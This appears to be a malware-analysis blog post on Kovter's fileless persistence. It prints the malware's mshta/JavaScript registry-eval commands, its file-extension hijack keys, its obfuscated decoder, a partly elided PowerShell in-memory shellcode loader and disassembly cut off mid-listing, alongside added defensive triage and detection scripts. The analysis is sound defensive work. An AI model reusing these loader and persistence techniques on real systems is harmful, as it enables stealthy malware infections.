29/09/2016
08:53

Kovter: malware that spreads without creating files



A few weeks ago we dealt with an infection by a malware called Kovter.

Kovter is a malware classified as "fileless": the malware is not stored in a file but in the Windows registry.
This particular technique had already been implemented, starting in 2014, by Trojan.Poweliks.

Kovter started spreading in 2013 and has since evolved into the latest version seen today.


How Kovter runs


Kovter uses two methods to run automatically:
  • it places a shortcut with a random name in the Startup folder: %user%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<random>.lnk
  • it modifies the registry key HKCU\..\Run so that it runs a shortcut with a random name

Shortcut in the Startup folder

The shortcut in the Startup folder runs the following command:

C:\WINDOWS\system32\mshta.exe "javascript:x6uokfa="1H4Iy4";i4f=new ActiveXObject("WScript.Shell");k1GFd="Lo"; eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix"); Cax4C="j";eval(eB38vo);wUtAao9="taH";"

mshta.exe is a legitimate Windows program; here it is run with a piece of JavaScript code passed as its parameter:


x6uokfa="1H4Iy4";
i4f=new ActiveXObject("WScript.Shell");
k1GFd="Lo";
eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix");
Cax4C="j";
eval(eB38vo);
wUtAao9="taH";

The script reads the contents of the key "HKCU\software\hpkxvramhp\hjmyqgix" and executes them through eval.


Modification of the HKCU\..\Run key

Kovter adds the following value to the HKCU\..\Run registry key:

[*random] = %user%\AppData\Local\<random>\<random>.lnk

example: C:\Users\<user>\AppData\Local\437680\20c820.lnk

The [*random] value name contains a character that the Regedit utility cannot read, so Regedit displays the following error message:



The randomly named shortcut runs a batch file, also randomly named and stored in the same folder, for example:

%user%\AppData\Local\437680\1f41aa.bat

The randomly named batch file (1f41aa.bat) runs the following command:

start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

The start command runs the file passed to it as a parameter, in our case d3d9d7.da511ec.
As you can see, this file does not have a well-known extension such as .exe, yet Windows treats this extension as "executable".


Here Kovter uses a trick: it registers the ".da511ec" extension so that Windows recognises it.
To do so it adds the following registry keys:

[HKEY_CLASSES_ROOT\.da511ec]
@="eb4832"

[HKEY_CLASSES_ROOT\eb4832\shell\open\command]
@="\"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\"; joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Adding these keys causes files with the ".da511ec" extension to be opened with mshta.exe, which is passed the malicious JavaScript code as its parameter.

So running the command:
start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

actually runs:
"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\"; joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Kovter therefore uses two methods to run its JavaScript code.
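The two autorun paths above leave artifacts that can be checked mechanically. The following Python script is an added example, not code from the original post or from TG Soft: it triages a list of constructed autorun artifacts (Run values, Startup-folder shortcut targets and HKEY_CLASSES_ROOT handlers) and flags the patterns described here: a value name containing a non-printable character, a Run entry that launches a .lnk under AppData\Local, and mshta.exe invoked with an inline javascript: payload, from which it also extracts the registry path read with RegRead. The user name, the value names and the eb4832 handler data are constructed; the hpkxvramhp\hjmyqgix path is the one from this analysis.

```python
import re

# Constructed sample artifacts modelled on the persistence entries described in the
# post (the user name, value names and the eb4832 handler data are made up here).
SAMPLE_ARTIFACTS = [
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "\x01b7e2d4",            # constructed: non-printable first character
     "data": r"C:\Users\alice\AppData\Local\437680\20c820.lnk"},
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "OneDrive",
     "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"source": r"HKEY_CLASSES_ROOT\eb4832\shell\open\command",
     "name": "",
     "data": ('"C:\\WINDOWS\\system32\\mshta.exe" "javascript:a="x";'
              'p=new ActiveXObject("WScript.Shell");'
              's=p.RegRead("HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix");eval(s);"')},
    {"source": r"HKEY_CLASSES_ROOT\.txt", "name": "", "data": "txtfile"},
    {"source": "Startup folder shortcut",
     "name": "k3j9x.lnk",
     "data": ('C:\\WINDOWS\\system32\\mshta.exe "javascript:i=new ActiveXObject("WScript.Shell");'
              'e=i.RegRead("HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix");eval(e);"')},
]

MSHTA_JS_RE = re.compile(r"mshta(?:\.exe)?\b.*javascript:", re.I | re.S)
REGREAD_RE = re.compile(r'RegRead\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.I)
LNK_IN_LOCAL_RE = re.compile(r"\\AppData\\Local\\[^\\]+\\[^\\]+\.lnk$", re.I)


def staged_payload_key(command: str):
    """Return the registry path a mshta javascript: payload reads with RegRead, or None."""
    m = REGREAD_RE.search(command)
    if not m:
        return None
    # JScript source doubles every backslash; collapse them to the real path.
    return m.group(1).replace("\\\\", "\\")


def triage_artifact(art: dict) -> list:
    """Return human-readable findings for one autorun artifact (empty list if nothing matched)."""
    findings = []
    src, name, data = art["source"], art["name"], art["data"]
    if any(not ch.isprintable() for ch in name):
        findings.append("value name contains a non-printable character (Regedit cannot display it)")
    if src.lower().endswith(r"\run") and LNK_IN_LOCAL_RE.search(data):
        findings.append("Run entry launches a .lnk stored under AppData\\Local")
    if MSHTA_JS_RE.search(data):
        findings.append("mshta.exe is invoked with an inline javascript: payload")
        key = staged_payload_key(data)
        if key:
            findings.append("payload is staged in registry value " + key)
        if src.upper().startswith("HKEY_CLASSES_ROOT") and src.lower().endswith(r"\shell\open\command"):
            findings.append("file-type handler redirects a custom extension to mshta.exe")
    return findings


def triage_all(artifacts: list) -> dict:
    """Map artifact index -> findings, keeping only artifacts that raised at least one."""
    return {i: f for i, a in enumerate(artifacts) if (f := triage_artifact(a))}


if __name__ == "__main__":
    for idx, found in triage_all(SAMPLE_ARTIFACTS).items():
        print(SAMPLE_ARTIFACTS[idx]["source"], SAMPLE_ARTIFACTS[idx]["name"] or "(default)")
        for f in found:
            print("   -", f)
```

On a real host the artifact list would be built from a registry export or from the output of a registry-reading tool; the script only inspects the strings it is given and never executes them, so it is safe to run over data collected from an infected machine.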



Analysis of the script stored in "HKCU\software\hpkxvramhp\hjmyqgix"


Here we can see Kovter's randomly named registry key, HKCU\software\hpkxvramhp:


The script stored in the key "HKCU\software\hpkxvramhp\hjmyqgix" is obfuscated:


ZkiWOtZypMULIBG9qrrD="2nzAtBJtgQYLrRLzrg2TdDm0fTwtN7Ic";
O7PlR5uFSdkPYNrjZhe="DkVifljAd1IPcr5vGPfUtx";
Fohg1ujfWzRyMiXFRcneWxW4="MKXKSj6SJMRSTdQTadNQEmS8ph2NRmgTFJb";
mQfOBK6yjvxYdLNRIGFfGvPw="HZb12ww55xVi1rBXcDPK95PrI9qzNAD6rSFcqagM";
vrRHp0KKrR7ZveKiknDcYK="KGmNljtpOoPLKCThFcqwNQ5yXDsDE2g5hqFL7AkUlg";
lBMX2IP5hjeQCLgHmzbTKmdBo="r26TebqQPsyzVtodCaqe2oPCzirFM2W9sosS";

HjU2="180A4E020B1B373F222D2411191D1926331A380A [..] 9360F1E6850";

ATLaipjOWiJDbQAznVbD9jL="iFl6LyFIHQLkuiwxaH";
DvkCSeJGKXTu5nzfFmzvygFH="Byo15vi5zPcqS2qFTJOctr9wokbdJqpI";
PtExHAoHmpKvm6LfGgh="hWIWb1gtI4ERmSg9jd09";
lmkxbKzuBahY68nRzBrKRmUS="ryLa69HSi7AQfpKXvmgR2Vkeb1BjFDJUPx";

wdQ3co="";
// stage 1: turn the hex string HjU2 into raw characters, two hex digits per character
for(kmzTk7ch=0;kmzTk7ch<HjU2.length;kmzTk7ch+=2)
    wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(kmzTk7ch,2),16));

ydvrOaLz2HZcnCYYkaj="wTIXNVLV60c5UDugog5qb";
PaPL8mXPEMyhvkf7VeyMdTR="JV4zU6NghDkk91qEK9u9htejMug2O7su";
RAGiRQTTVmMZ83FhbgjyIxAE="Wmo9xzd5h4K2aNyyLQhPdVYJKDTbBem3tt5ysnCzx";
wBYGstBJNlcvNcWCa9="15MCvunOq3VJS4gx825XBJifrvISFcZtvfmamrUWCDtlRd";
OmtaJnSPjpe4pXLYbBF2="oYeGuiuo1wQsYxaZoOpe1NM8y9xwNgXZajkK78H";
JYVks3AYUzeCFJIWfkUPE="4hg7sxnxB6NsncATOG";
YSzOYZNYXNkqN2WJvTHv="YkDbFfePrjt6HId2b4AswRtW";
ljxEXRUIo0Qjpmwr1nMN="ctK3nnLWU4djCYIymXrHLYSFIrUxU3eH";
evgsfov21ZJ="lhvSYvRVpGGvHIxSdRanhtd6gXeHJN4IdBXsrtPBEO17ZGOuDVEj6AkR75izW";

gKTiCbtkFl5a="";
// stage 2: XOR each character with the key string evgsfov21ZJ; the key index wraps back to 0
for(NLhDZDUIcZn5XE=kkAphRRJTody9D0lR=0;kkAphRRJTody9D0lR<wdQ3co.length;kkAphRRJTody9D0lR++)
{
    gKTiCbtkFl5a+=String.fromCharCode(wdQ3co.substr(kkAphRRJTody9D0lR,1).charCodeAt()^evgsfov21ZJ.substr(NLhDZDUIcZn5XE,1).charCodeAt());
    NLhDZDUIcZn5XE=(NLhDZDUIcZn5XE<evgsfov21ZJ.length-1)?NLhDZDUIcZn5XE+1:0;
}


ZABLXRQGMq09SljWiVtr="9JKsvjk4P2Ll2Jwz83tmlOVk9mOKBug2bb9p9UDjD";
loSSXayazxvyKP9ewHZw1Lk="lPHxkgl55EwVP5Tpg9cAeFq2";
IAREsOdQtRxh2QjeyYVsws="YfO26CzYlcPCVUjrT48uK36KKOetSxTdY0PwkkLMfqK";
FcXnrjQSGhP1IIGEROKDPDh="f0zkcSKM4h0YaVGzvNJV";
qMyKeAMydCiC1VeFxewzqcwF="JoknyqQX1e8hQfFlDr";
Bu0tWsiVrAbCnBrrQgfco="H80AX2ztfx6kgQ1qbjKNc";

eval(gKTiCbtkFl5a);

MqslAVCZqdnNTFKpuJd7y="3fAmC1pt9tag38olxxXk";
SmUxB5WxYzMXGe7xkTaa="xAQ0ZR16dmiaDcB0nIp1tDTnh0DaEuJs4vu7Pzx937Kb";
fPjxGMkXi2A1yeboAoFzYuFi="i3UxxPkQ1TAYNURKdCb8XflpjQ7sCSjzJJ";
CwjNpyGMjcktWTbjF5EVDD="WSaorKEaleV0u7wrLfc8DN";
zeQ5DhYtR0dvZFkzBuTE="5nrYPt5gTHfW2Qhtvi8mzRt";
YUyBjQEh1bynUrzllDaEg="t5ubP6o1E29LKwk4AE4SlJg";


After de-obfuscating the script, the variable gKTiCbtkFl5a contains the following code:

tb8QRmeiRjcgQTauWHYd="tFg0e3aPTMijrBS8VYUeg9OTT7w7v2qY8hW16zb2vrN6";
scFiLQBmpVrejk7LOJD="Kc8JS7vM7zJPVjhs6lazVbRXBfgiU7oEFu1Axr";
FwRki5kymuSHEg5pnbPViUBt="oumMQgDIjMtmH6lH1bkK4ZsGpO2ryzZ04IFQ79";
JwFVDCBaEReTikqFfEsYr93P="9H9y6PG2sZeu7OWisk36UtQ";
qpidwGNUkfftJr4pcxHdShzv="vCDAdk54adDpeNAfrJHwY8RE4ZpWrLwFbRufEd2JbI";
zAoJE3XKRMQbBvUuQv4="T46t3bKeodHAmla488ompKrwPwTn";
UScSggymSrjTDXFe2J0qR="WJqcZB6w4HCiAUegDXAJdNKVj3yZpQzRgt0o";
WeSxn5UshbIhExFjzg="zJ6l0g7MdLYp1aLvlRh0pujqcRqfsYTg93psVCzx18BHZye";

try {
    moveTo(-100,-100);
    resizeTo(0,0);
    c9Z=new ActiveXObject("WScript.Shell");
    (c9Z.Environment("Process"))("xcly")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('c2xlZXAoNDApO3Rye [...] leGl0Ow==')))"
    aA0g0r=c9Z.Run("C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:xcly",0,1)
}
catch(e){}close();
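The two loops in the obfuscated script are a generic two-stage decoder (hex digits to bytes, then a repeating-key XOR with the key index wrapping to zero), and the decoy string assignments around them do not take part in it. As an added example, not code from the original post, the following Python script reimplements both stages, locates the key and the hex blob in a script of that shape, and decodes it. The key ConstructedKey42, the plaintext and the sample script are constructed for the example; Kovter's real key and payload are not reproduced.

```python
import re

# Constructed key and plaintext for the example; Kovter's real key and payload are not reproduced.
SAMPLE_KEY = "ConstructedKey42"
SAMPLE_PLAIN = 'try { s=new ActiveXObject("WScript.Shell"); } catch(e){}'


def hex_stage(hex_text: str) -> bytes:
    """Stage 1 of the script: every pair of hex digits becomes one byte (parseInt(..., 16))."""
    if len(hex_text) % 2:
        raise ValueError("hex string has odd length")
    return bytes(int(hex_text[i:i + 2], 16) for i in range(0, len(hex_text), 2))


def xor_stage(data: bytes, key: bytes) -> bytes:
    """Stage 2: XOR each byte with the key, the key index wrapping to 0 exactly as the
    script's conditional expression does. XOR is symmetric, so this also encodes."""
    if not key:
        raise ValueError("empty key")
    out = bytearray()
    k = 0
    for b in data:
        out.append(b ^ key[k])
        k = k + 1 if k < len(key) - 1 else 0
    return bytes(out)


def encode_payload(plain: str, key: str) -> str:
    """Inverse pipeline, used only to build the constructed sample script below."""
    return xor_stage(plain.encode("latin-1"), key.encode("latin-1")).hex().upper()


def find_decoder_inputs(script: str):
    """Locate the key variable (the operand after '^' in the XOR loop) and the hex blob
    (the longest even-length string literal made only of hex digits)."""
    m = re.search(r"\^\s*([A-Za-z_$][\w$]*)\.substr\(", script)
    if not m:
        return None
    key_name = m.group(1)
    km = re.search(r"(?<![\w$])" + re.escape(key_name) + r'\s*=\s*"([^"]*)"', script)
    hex_literals = [h for h in re.findall(r'=\s*"([0-9A-Fa-f]+)"', script) if len(h) % 2 == 0]
    if not km or not hex_literals:
        return None
    return max(hex_literals, key=len), km.group(1)


def deobfuscate_script(script: str) -> str:
    """Return the code the script would pass to eval(), or raise if the pattern is absent."""
    found = find_decoder_inputs(script)
    if found is None:
        raise ValueError("decoder pattern not found")
    hex_text, key = found
    return xor_stage(hex_stage(hex_text), key.encode("latin-1")).decode("latin-1")


# Constructed obfuscated script with the same shape as the one analysed above (decoy
# strings, hex blob, two loops, eval), built from SAMPLE_PLAIN and SAMPLE_KEY.
SAMPLE_SCRIPT = (
    'ZkiWOtZypM="2nzAtBJtgQYLrRLz";\n'
    'HjU2="' + encode_payload(SAMPLE_PLAIN, SAMPLE_KEY) + '";\n'
    'wdQ3co="";\n'
    'for(i=0;i<HjU2.length;i+=2) wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(i,2),16));\n'
    'evg="' + SAMPLE_KEY + '";\n'
    'g="";\n'
    'for(j=k=0;k<wdQ3co.length;k++){g+=String.fromCharCode(wdQ3co.substr(k,1).charCodeAt()'
    '^evg.substr(j,1).charCodeAt());j=(j<evg.length-1)?j+1:0;}\n'
    'eval(g);\n'
)

if __name__ == "__main__":
    print(deobfuscate_script(SAMPLE_SCRIPT))
```

Because the decoder is static, the payload can be recovered from a registry export without ever running mshta.exe or the script: paste the exported value into deobfuscate_script and read the result.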


This script runs powershell.exe with the parameter "iex $env:xcly": Invoke-Expression (iex) executes the contents of the environment variable xcly, which the script has just set and which contains the code to run.
That code is Base64-encoded; after decoding it we get:


sleep(40);
try {
    function gdelegate {
        Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
       
        $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System. [..];
        $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public", [..] ");
        $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual", [..] ");
        return $TypeBuilder.CreateType();
    }
   
    function gproc {
        Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
       
        $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
        $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
        return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@( [..] );
    }
   
   
    [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF, [...] , 0xE6,0xED,0xB3;
    [Uint32[]] $op=0;
   
    $r=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualProtect),(gdelegate @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($sc32,$sc32.Length,0x40,$op);
   
    if($r -eq 0) {
        $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
       
        if($pr -ne 0) {
            $memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
           
            for ($i=0;$i -le ($sc32.Length-1);$i++) {
                $memset.Invoke(($pr+$i), $sc32[$i], 1)
            };
            ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
        }
    }
    else {
        ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[Byte[]],[Byte[]],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$sc32,$sc32,0,0);
    }
    sleep(1200);
}
catch{}exit;

Kovter's PowerShell code performs the following operations:
  • the $sc32 array is filled with machine-code instructions: 0x55,0x8B,0xEC,0x81 etc.
  • it calls the VirtualProtect API on the $sc32 array; if the call succeeds it creates a thread (CreateThread) whose entry point is the $sc32 array itself.
  • if the previous VirtualProtect call fails, it allocates a memory buffer with VirtualAlloc, copies the $sc32 array into the allocated buffer (with memset), then creates a thread (CreateThread) whose entry point is the address of the allocated buffer.
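The loader above is recognisable in PowerShell script-block logs (Event ID 4104) by the API names it has to use, whatever the random variable names around them. As an added example, not code from the original post, the following Python script scores a script-block text against those indicators, peeling one or more FromBase64String layers first so that the wrapped stage is scored as well. The loader text, the benign script and the byte values are constructed, the loader fragment is not functional, and the indicator names are my own.

```python
import base64
import re

# Constructed script-block text shaped like the loader above: a decoy "sleep", a reflective
# GetProcAddress lookup, a byte array of machine code and delegate-based API calls.
# The byte values after the first few are made up; this fragment does not run anything.
INNER_STAGE = r"""sleep(40);
$u=$a.GetType("Microsoft.Win32.UnsafeNativeMethods");
$gpa=$u.GetMethod("GetProcAddress");
[Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x90;
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gpa.Invoke($null,@($k32,"VirtualProtect")),$d1);
$ct=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gpa.Invoke($null,@($k32,"CreateThread")),$d2);
$ct.Invoke(0,0,$sc32,$sc32,0,0);"""

# Outer layer as it would appear in the log: the inner stage wrapped in FromBase64String
# and handed to Invoke-Expression, like the xcly variable above.
OUTER_STAGE = ("iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
               + base64.b64encode(INNER_STAGE.encode("ascii")).decode("ascii") + "')))")

# Constructed benign administrative script for comparison.
BENIGN_SCRIPT = r"""Get-ChildItem C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Remove-Item"""

# Indicator names are my own; each pattern is one trait of the loader described in the post.
INDICATORS = {
    "delegate_from_pointer": r"GetDelegateForFunctionPointer",
    "reflective_getprocaddress": r"UnsafeNativeMethods|GetProcAddress",
    "memory_rwx": r"VirtualAlloc|VirtualProtect",
    "thread_start": r"CreateThread",
    "shellcode_bytes": r"\[Byte\[\]\]\s*\$\w+\s*=\s*(?:0x[0-9A-Fa-f]{2}\s*,\s*){8,}",
    "env_var_stage": r"\biex\s+\$env:\w+",
    "base64_stage": r"FromBase64String\('([A-Za-z0-9+/=]+)'\)",
}


def unwrap_base64_stage(script: str):
    """Decode the first FromBase64String('...') literal, or return None if there is none."""
    m = re.search(INDICATORS["base64_stage"], script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("ascii", errors="replace")
    except ValueError:
        return None


def score_script_block(script: str, max_depth: int = 3) -> dict:
    """Peel base64 layers (up to max_depth) and score the union of all layers against INDICATORS."""
    layers = [script]
    while len(layers) <= max_depth:
        inner = unwrap_base64_stage(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    text = "\n".join(layers)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    return {"score": len(hits), "indicators": hits, "layers": len(layers),
            "innermost": layers[-1]}


if __name__ == "__main__":
    for label, s in (("loader", OUTER_STAGE), ("benign", BENIGN_SCRIPT)):
        r = score_script_block(s)
        print(label, r["score"], r["indicators"])
```

A single indicator (a byte array, or a base64 literal) is common in legitimate scripts; it is the combination of delegate creation, GetProcAddress resolution, memory-protection changes and CreateThread in one block that is worth alerting on, which is why the function reports the list of hits rather than a boolean.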

Let's now see what the thread created by Kovter does:


seg000:00000000                 push    ebp
seg000:00000001                 mov     ebp, esp
seg000:00000003                 add     esp, 0FFFFFA00h
seg000:00000009                 push    ebx
seg000:0000000A                 push    esi
seg000:0000000B                 push    edi
seg000:0000000C                 push    ebx
seg000:0000000D                 push    esi
seg000:0000000E                 push    edi
seg000:0000000F                 cld
seg000:00000010                 xor     edx, edx
seg000:00000012                 mov     edx, fs:[edx+30h]
seg000:00000016                 mov     edx, [edx+0Ch]
seg000:00000019                 mov     edx, [edx+14h]
seg000:0000001C

[..]

seg000:0000004A                 mov     [ebp-2Ch], eax
seg000:0000004D                 mov     eax, [ebp-2Ch]
seg000:00000050                 cmp     word ptr [eax], 'ZM'
seg000:00000055                 jnz     loc_400026A
seg000:0000005B                 mov     eax, [ebp-4]
seg000:0000005E                 xor     edx, edx
seg000:00000060                 push    edx
seg000:00000061                 push    eax
seg000:00000062                 mov     eax, [ebp-2Ch]
seg000:00000065                 mov     eax, [eax+3Ch]
seg000:00000068                 cdq
seg000:00000069                 add     eax, [esp]
seg000:0000006C                 adc     edx, [esp+4]
seg000:00000070                 add     esp, 8
seg000:00000073                 mov     [ebp-30h], eax
seg000:00000076                 mov     eax, [ebp-30h]
seg000:00000079                 cmp     dword ptr [eax], 'EP'
seg000:0000007F                 jnz     loc_400026A
seg000:00000085                 mov     eax, [ebp-30h]

[..]

seg000:000000D5                 add     ecx, [ebp-4]
seg000:000000D8                 cmp     dword ptr [ecx], 'daoL'
seg000:000000DE                 jnz     short loc_4000136
seg000:000000E0                 lea     eax, [ecx+4]
seg000:000000E3                 cmp     dword ptr [eax], 'rbiL'
seg000:000000E9                 jnz     short loc_4000136
seg000:000000EB                 lea     eax, [ecx+8]
seg000:000000EE                 cmp     dword ptr [eax], 'Ayra'
seg000:000000F4                 jnz     short loc_4000136
seg000:000000F6                 lea     eax, [ecx+0Ch]
seg000:000000F9                 cmp     byte ptr [eax], 0
seg000:000000FC                 jnz     short loc_4000136
seg000:000000FE                 mov     eax, [ebp-34h]
seg000:00000101                 mov     eax, [eax+24h]
seg000:00000104                 add     eax, [ebp-4]
seg000:00000107                 xor     edx, edx
seg000:00000109                 push    edx
seg000:0000010A                 push    eax
seg000:0000010B                 mov     eax, esi
seg000:0000010D                 add     eax, eax
seg000:0000010F                 cdq
seg000:00000110                 add     eax, [esp]
seg000:00000113                 adc     edx, [esp+4]
seg000:00000117                 add     esp, 8
seg000:0000011A                 mov     ax, [eax]
seg000:0000011D                 mov     edx, [ebp-34h]
seg000:00000120                 mov     edx, [edx+1Ch]
seg000:00000123                 add     edx, [ebp-4]
seg000:00000126                 movzx   eax, ax
seg000:00000129                 shl     eax, 2
seg000:0000012C                 add     edx, eax
seg000:0000012E                 mov     eax, [edx]
seg000:00000130                 add     eax, [ebp-4]
seg000:00000133
seg000:00000133 loc_4000133:
seg000:00000133                 mov     [LoadLibraryA], eax   ;[ebp-44h]
seg000:00000136
seg000:00000136 loc_4000136:                            ; CODE XREF: seg000:000000DEj
seg000:00000136                                         ; seg000:000000E9j ...
seg000:00000136                 cmp     dword ptr [ecx], 'PteG'
seg000:0000013C                 jnz     short loc_4000194
seg000:0000013E                 lea     eax, [ecx+4]
seg000:00000141                 cmp     dword ptr [eax], 'Acor'
seg000:00000147                 jnz     short loc_4000194
seg000:00000149                 lea     eax, [ecx+8]
seg000:0000014C                 cmp     dword ptr [eax], 'erdd'
seg000:00000152                 jnz     short loc_4000194
seg000:00000154                 lea     eax, [ecx+0Eh]

[..]

seg000:0000018E                 add     eax, [ebp-4]
seg000:00000191                 mov     [GetProcAddress], eax  ; [ebp-48h]
seg000:00000194
seg000:00000194 loc_4000194:                            ; CODE XREF: seg000:0000013Cj
seg000:00000194                                         ; seg000:00000147j ...
seg000:00000194                 cmp     dword ptr [ecx], 'triV'
seg000:0000019A                 jnz     short loc_40001F2
seg000:0000019C                 lea     eax, [ecx+4]
seg000:0000019F                 cmp     dword ptr [eax], 'Alau'
seg000:000001A5                 jnz     short loc_40001F2
seg000:000001A7                 lea     eax, [ecx+8]
seg000:000001AA                 cmp     dword ptr [eax], 'coll'
seg000:000001B0                 jnz     short loc_40001F2

[..]

seg000:000001EA                 mov     eax, [edx]
seg000:000001EC                 add     eax, [ebp-4]
seg000:000001EF                 mov     [VirtualAlloc], eax  ; [ebp-58h]

[..]

seg000:0000026A                 mov     byte ptr [ebp-0D1h], 61h ; 'a'
seg000:00000271                 mov     byte ptr [ebp-0D0h], 64h ; 'd'
seg000:00000278                 mov     byte ptr [ebp-0CFh], 76h ; 'v'
seg000:0000027F                 mov     byte ptr [ebp-0CEh], 61h ; 'a'
seg000:00000286                 mov     byte ptr [ebp-0CDh], 70h ; 'p'
seg000:0000028D                 mov     byte ptr [ebp-0CCh], 69h ; 'i'
seg000:00000294                 mov     byte ptr [ebp-0CBh], 33h ; '3'
seg000:0000029B                 mov     byte ptr [ebp-0CAh], 32h ; '2'
seg000:000002A2                 mov     byte ptr [ebp-0C9h], 2Eh ; '.'
seg000:000002A9                 mov     byte ptr [ebp-0C8h], 64h ; 'd'
seg000:000002B0                 mov     byte ptr [ebp-0C7h], 6Ch ; 'l'
seg000:000002B7                 mov     byte ptr [ebp-0C6h], 6Ch ; 'l'
seg000:000002BE                 mov     byte ptr [ebp-0C5h], 0
seg000:000002C5                 lea     eax, [ebp-0D1h]
seg000:000002CB                 push    eax
seg000:000002CC                 call    dword ptr [LoadLibraryA]

[..]

seg000:00000364                 cmp     dword ptr [ecx], 'OgeR'
seg000:0000036A                 jnz     short loc_40003C7
seg000:0000036C                 lea     eax, [ecx+4]
seg000:0000036F                 cmp     dword ptr [eax], 'Knep'
seg000:00000375                 jnz     short loc_40003C7
seg000:00000377                 lea     eax, [ecx+8]
seg000:0000037A                 cmp     dword ptr [eax], 'xEye'
seg000:00000380                 jnz     short loc_40003C7

[..]

seg000:000003C4                 mov     [RegOpenKeyEx], eax   ; [ebp-50h]
seg000:000003C7                 cmp     dword ptr [ecx], 'QgeR'
seg000:000003CD                 jnz     short loc_400042D
seg000:000003CF                 lea     eax, [ecx+4]
seg000:000003D2                 cmp     dword ptr [eax], 'yreu'
seg000:000003D8                 jnz     short loc_400042D
seg000:000003DA                 lea     eax, [ecx+8]
seg000:000003DD                 cmp     dword ptr [eax], 'ulaV'
seg000:000003E3                 jnz     short loc_400042D
seg000:000003E5                 lea     eax, [ecx+0Ch]
seg000:000003E8                 cmp     dword ptr [eax], 'AxEe'

[..]

seg000:0000042A                 mov     [RegQueryValueEx], eax  ; [ebp-54h]

[..]

seg000:0000043A                 mov     eax, [ebp+8]
seg000:0000043D                 add     eax, 0A48h            ; 'software\hpkxvramhp',0
seg000:00000442                 mov     [ebp-84h], eax
seg000:00000448                 mov     eax, [ebp-84h]
seg000:0000044E                 add     eax, 0E4h ; 'õ'        ; eax = 0xb2c
seg000:00000453                 mov     [0xb2c], eax    ; [ebp-88h]
seg000:00000459                 xor     ebx, ebx
seg000:0000045B                 xor     eax, eax
seg000:0000045D                 mov     [ebp-9Ch], eax ; = 0
seg000:00000463                 xor     eax, eax
seg000:00000465                 mov     [ebp-0A0h], eax ; = 0
seg000:0000046B                 lea     eax, [ebp-90h]
seg000:00000471                 push    eax
seg000:00000472                 push    1
seg000:00000474                 push    0
seg000:00000476                 mov     eax, [ebp-84h]
seg000:0000047C                 push    eax
seg000:0000047D                 push    80000002h
seg000:00000482                 call    dword ptr [RegOpenKeyEx]
seg000:00000485                 test    eax, eax
seg000:00000487                 jnz     loc_4000513
seg000:0000048D                 lea     eax, [ebp-0A0h]
seg000:00000493                 push    eax
seg000:00000494                 push    0
seg000:00000496                 lea     eax, [ebp-94h]
seg000:0000049C                 push    eax
